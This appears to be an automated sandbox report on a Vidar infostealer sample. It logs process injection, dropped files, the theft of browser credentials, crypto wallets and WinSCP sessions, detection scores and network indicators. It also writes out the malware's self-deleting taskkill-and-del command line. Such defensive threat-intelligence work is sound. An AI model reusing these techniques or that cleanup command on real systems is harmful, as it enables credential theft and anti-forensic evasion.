Binary or memory string: CCONOUT$AVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLLLTWZHXP

Source: C:\Windows\SysWOW64\timeout.exe TID: 6792

Thread sleep count: 47 > 30

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\Secur32.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Dropped PE file which has not been started: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Dropped PE file which has not been started: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Dropped PE file which has not been started: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Registry key enumerated: More than 150 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Code function: 14_2_00406D10 GetSystemInfo,

14_2_00406D10

Source: C:\Users\user\Desktop\MzRn1YNrbz.exe	Code function: 0_2_00F1F23E FindFirstFileExW,	0_2_00F1F23E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 14_2_00407000 FindFirstFileA,	14_2_00407000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 14_2_00436483 FindFirstFileExW,	14_2_00436483

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\	Jump to behavior

Source: AppLaunch.exe, 00000002.00000002.514036740.000000000533B000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 0000000E.00000002.543780633.0000000004D86000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 0000000E.00000002.544334830.0000000006CB1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: AppLaunch.exe, 00000002.00000002.514036740.000000000533B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWen-USn

Source: C:\Users\user\Desktop\MzRn1YNrbz.exe

Code function: 0_2_00F11BA0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00F11BA0

Source: C:\Users\user\Desktop\MzRn1YNrbz.exe

Code function: 0_2_00F2297A GetProcessHeap,

0_2_00F2297A

Source: C:\Windows\SysWOW64\taskkill.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\MzRn1YNrbz.exe	Code function: 0_2_00F151A5 mov eax, dword ptr fs:[00000030h]	0_2_00F151A5
Source: C:\Users\user\Desktop\MzRn1YNrbz.exe	Code function: 0_2_00F20374 mov eax, dword ptr fs:[00000030h]	0_2_00F20374
Source: C:\Users\user\Desktop\MzRn1YNrbz.exe	Code function: 0_2_00F027C0 mov eax, dword ptr fs:[00000030h]	0_2_00F027C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 14_2_004295D4 mov eax, dword ptr fs:[00000030h]	14_2_004295D4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 14_2_00432640 mov eax, dword ptr fs:[00000030h]	14_2_00432640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 14_2_00432684 mov eax, dword ptr fs:[00000030h]	14_2_00432684
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 14_2_004326B5 mov eax, dword ptr fs:[00000030h]	14_2_004326B5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 14_2_00421BF0 mov eax, dword ptr fs:[00000030h]	14_2_00421BF0

Source: C:\Users\user\Desktop\MzRn1YNrbz.exe	Code function: 0_2_00F0C4F0 SetUnhandledExceptionFilter,	0_2_00F0C4F0
Source: C:\Users\user\Desktop\MzRn1YNrbz.exe	Code function: 0_2_00F0C068 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00F0C068
Source: C:\Users\user\Desktop\MzRn1YNrbz.exe	Code function: 0_2_00F11BA0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00F11BA0
Source: C:\Users\user\Desktop\MzRn1YNrbz.exe	Code function: 0_2_00F0C38D IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00F0C38D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 14_2_00425405 SetUnhandledExceptionFilter,	14_2_00425405
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 14_2_004290E3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	14_2_004290E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 14_2_00425272 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	14_2_00425272
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 14_2_00424DEC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	14_2_00424DEC

HIPS / PFW / Operating System Protection Evasion

Writes to foreign memory regions

Source: C:\Users\user\Desktop\MzRn1YNrbz.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\MzRn1YNrbz.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 4EBB008	Jump to behavior
Source: C:\ProgramData\SRT2H1V9CYLP5LNSR3MB.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 400000	Jump to behavior
Source: C:\ProgramData\SRT2H1V9CYLP5LNSR3MB.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 488B008	Jump to behavior

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\MzRn1YNrbz.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 400000 protect: page execute and read and write			Jump to behavior
Source: C:\ProgramData\SRT2H1V9CYLP5LNSR3MB.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 400000 protect: page execute and read and write			Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\MzRn1YNrbz.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 400000 value starts with: 4D5A			Jump to behavior
Source: C:\ProgramData\SRT2H1V9CYLP5LNSR3MB.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 400000 value starts with: 4D5A			Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im AppLaunch.exe /f

Jump to behavior

Source: C:\Users\user\Desktop\MzRn1YNrbz.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process created: C:\ProgramData\SRT2H1V9CYLP5LNSR3MB.exe "C:\ProgramData\SRT2H1V9CYLP5LNSR3MB.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /im AppLaunch.exe /f & timeout /t 6 & del /f /q "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe" & del C:\ProgramData\*.dll & exit	Jump to behavior
Source: C:\ProgramData\SRT2H1V9CYLP5LNSR3MB.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im AppLaunch.exe /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 6	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Queries volume information: C:\ProgramData\4YYGUQ5HBW956C5CCOF\files\Autofill\Google Chrome_Default.txt VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Queries volume information: C:\ProgramData\4YYGUQ5HBW956C5CCOF\files\CC\Google Chrome_Default.txt VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Queries volume information: C:\ProgramData\4YYGUQ5HBW956C5CCOF\files\Cookies\Google Chrome_Default.txt VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Queries volume information: C:\ProgramData\4YYGUQ5HBW956C5CCOF\files\Downloads\Google Chrome_Default.txt VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Queries volume information: C:\ProgramData\4YYGUQ5HBW956C5CCOF\files\Files\Default.zip VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Queries volume information: C:\ProgramData\4YYGUQ5HBW956C5CCOF\files\History\Google Chrome_Default.txt VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Queries volume information: C:\ProgramData\4YYGUQ5HBW956C5CCOF\files\information.txt VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Queries volume information: C:\ProgramData\4YYGUQ5HBW956C5CCOF\files\passwords.txt VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Queries volume information: C:\ProgramData\4YYGUQ5HBW956C5CCOF\files\screenshot.jpg VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\MzRn1YNrbz.exe	Code function: EnumSystemLocalesW,	0_2_00F220A4
Source: C:\Users\user\Desktop\MzRn1YNrbz.exe	Code function: EnumSystemLocalesW,	0_2_00F22059
Source: C:\Users\user\Desktop\MzRn1YNrbz.exe	Code function: EnumSystemLocalesW,	0_2_00F179E6
Source: C:\Users\user\Desktop\MzRn1YNrbz.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	0_2_00F221CA
Source: C:\Users\user\Desktop\MzRn1YNrbz.exe	Code function: EnumSystemLocalesW,	0_2_00F2213F
Source: C:\Users\user\Desktop\MzRn1YNrbz.exe	Code function: GetLocaleInfoW,	0_2_00F2241D
Source: C:\Users\user\Desktop\MzRn1YNrbz.exe	Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	0_2_00F21DB7
Source: C:\Users\user\Desktop\MzRn1YNrbz.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_00F22543
Source: C:\Users\user\Desktop\MzRn1YNrbz.exe	Code function: GetLocaleInfoW,	0_2_00F22649
Source: C:\Users\user\Desktop\MzRn1YNrbz.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	0_2_00F22718
Source: C:\Users\user\Desktop\MzRn1YNrbz.exe	Code function: GetLocaleInfoW,	0_2_00F17F08

Source: C:\Users\user\Desktop\MzRn1YNrbz.exe

Code function: 0_2_00F0C605 cpuid

0_2_00F0C605

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\Desktop\MzRn1YNrbz.exe

Code function: 0_2_00F0C287 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00F0C287

Stealing of Sensitive Information

Yara detected Vidar stealer

Source: Yara match	File source: 0.2.MzRn1YNrbz.exe.e629ac.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.AppLaunch.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.MzRn1YNrbz.exe.e629ac.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.MzRn1YNrbz.exe.3070000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.MzRn1YNrbz.exe.3070000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.513781962.0000000000438000.00000002.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.460369691.0000000003070000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.460941674.0000000000E59000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MzRn1YNrbz.exe PID: 7016, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AppLaunch.exe PID: 6252, type: MEMORYSTR

Tries to steal Crypto Currency Wallets

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\f	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\f	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\?	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\?	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\?	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\?	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\2	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\2	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\	Jump to behavior

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration

Jump to behavior

Found many strings related to Crypto-Wallets (likely being stolen)

Source: AppLaunch.exe, 00000002.00000002.514036740.000000000533B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: objects.githubusercontent.com56C5CCOF\files\Wallets\Electrum
Source: AppLaunch.exe, 00000002.00000002.529884781.0000000025544000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: \Wallets\ElectronCash
Source: MzRn1YNrbz.exe, 00000000.00000003.460369691.0000000003070000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: Jaxx_New
Source: AppLaunch.exe, 00000002.00000002.529884781.0000000025544000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: \Wallets\ElectrumLTC
Source: AppLaunch.exe, 00000002.00000002.529884781.0000000025544000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\Ethereum\keystore
Source: AppLaunch.exe, 00000002.00000002.529884781.0000000025544000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: \Wallets\Jaxx_NewExodus
Source: AppLaunch.exe, 00000002.00000002.529884781.0000000025544000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\Ethereum\keystore
Source: AppLaunch.exe, 00000002.00000002.529884781.0000000025544000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: \Wallets\MultiDoge
Source: AppLaunch.exe, 00000002.00000002.529884781.0000000025544000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\Ethereum\keystore

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior

Source: Yara match	File source: 0.2.MzRn1YNrbz.exe.e629ac.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.AppLaunch.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.MzRn1YNrbz.exe.e629ac.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.MzRn1YNrbz.exe.3070000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.MzRn1YNrbz.exe.3070000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.513781962.0000000000438000.00000002.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.513911613.00000000052E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.460369691.0000000003070000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.460941674.0000000000E59000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MzRn1YNrbz.exe PID: 7016, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AppLaunch.exe PID: 6252, type: MEMORYSTR

Remote Access Functionality

Yara detected Vidar stealer

Source: Yara match	File source: 0.2.MzRn1YNrbz.exe.e629ac.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.AppLaunch.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.MzRn1YNrbz.exe.e629ac.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.MzRn1YNrbz.exe.3070000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.MzRn1YNrbz.exe.3070000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.513781962.0000000000438000.00000002.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.460369691.0000000003070000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.460941674.0000000000E59000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MzRn1YNrbz.exe PID: 7016, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AppLaunch.exe PID: 6252, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	1 Windows Management Instrumentation	1 Registry Run Keys / Startup Folder	311 Process Injection	1 Disable or Modify Tools	1 OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	1 Web Service	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	1 Command and Scripting Interpreter	Boot or Logon Initialization Scripts	1 Registry Run Keys / Startup Folder	1 Deobfuscate/Decode Files or Information	1 Input Capture	3 File and Directory Discovery	Remote Desktop Protocol	3 Data from Local System	Exfiltration Over Bluetooth	5 Ingress Tool Transfer	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	2 Obfuscated Files or Information	1 Credentials in Registry	55 System Information Discovery	SMB/Windows Admin Shares	1 Input Capture	Automated Exfiltration	11 Encrypted Channel	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	1 Software Packing	NTDS	1 Query Registry	Distributed Component Object Model	Input Capture	Scheduled Transfer	5 Non-Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 Masquerading	LSA Secrets	221 Security Software Discovery	SSH	Keylogging	Data Transfer Size Limits	6 Application Layer Protocol	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	1 Modify Registry	Cached Domain Credentials	1 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	1 Virtualization/Sandbox Evasion	DCSync	12 Process Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	311 Process Injection	Proc Filesystem	1 Remote System Discovery	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Masquerading	/etc/passwd and /etc/shadow	1 System Network Configuration Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
MzRn1YNrbz.exe	29%	Metadefender		Browse
MzRn1YNrbz.exe	61%	ReversingLabs	Win32.Trojan.PSWStealer

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.exe	100%	Avira	TR/Redcap.sblry
C:\ProgramData\SRT2H1V9CYLP5LNSR3MB.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\Software[2].exe	100%	Joe Sandbox ML
C:\ProgramData\SRT2H1V9CYLP5LNSR3MB.exe	61%	ReversingLabs	Win32.Trojan.SpyStealer
C:\ProgramData\freebl3.dll	3%	Metadefender		Browse
C:\ProgramData\freebl3.dll	0%	ReversingLabs
C:\ProgramData\mozglue.dll	6%	Metadefender		Browse
C:\ProgramData\mozglue.dll	0%	ReversingLabs
C:\ProgramData\msvcp140.dll	0%	Metadefender		Browse
C:\ProgramData\msvcp140.dll	0%	ReversingLabs
C:\ProgramData\nss3.dll	3%	Metadefender		Browse
C:\ProgramData\nss3.dll	0%	ReversingLabs
C:\ProgramData\softokn3.dll	3%	Metadefender		Browse
C:\ProgramData\softokn3.dll	0%	ReversingLabs
C:\ProgramData\vcruntime140.dll	0%	Metadefender		Browse
C:\ProgramData\vcruntime140.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.exe	11%	Metadefender		Browse
C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.exe	62%	ReversingLabs	Win64.Trojan.MintZard
C:\Users\user\AppData\Local\Microsoft\OneDrive\Secur32.dll	0%	Metadefender		Browse
C:\Users\user\AppData\Local\Microsoft\OneDrive\Secur32.dll	4%	ReversingLabs

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
7.3.SRT2H1V9CYLP5LNSR3MB.exe.2860000.0.unpack	100%	Avira	TR/ATRAPS.Gen4		Download File
0.2.MzRn1YNrbz.exe.e629ac.0.unpack	100%	Avira	TR/Patched.Ren.Gen		Download File

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://ocsp.sectigo.com0	0%	URL Reputation	safe
http://ocsp.thawte.com0	0%	URL Reputation	safe
http://www.mozilla.com0	0%	URL Reputation	safe
https://objects.githubusercontent.com/github-production-release-asset-2e65be/479754935/9956e2fd-f4a0	0%	Avira URL Cloud	safe
http://116.202.0.187/	0%	Avira URL Cloud	safe
http://116.202.0.187/update.zip	0%	Avira URL Cloud	safe
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t	0%	URL Reputation	safe
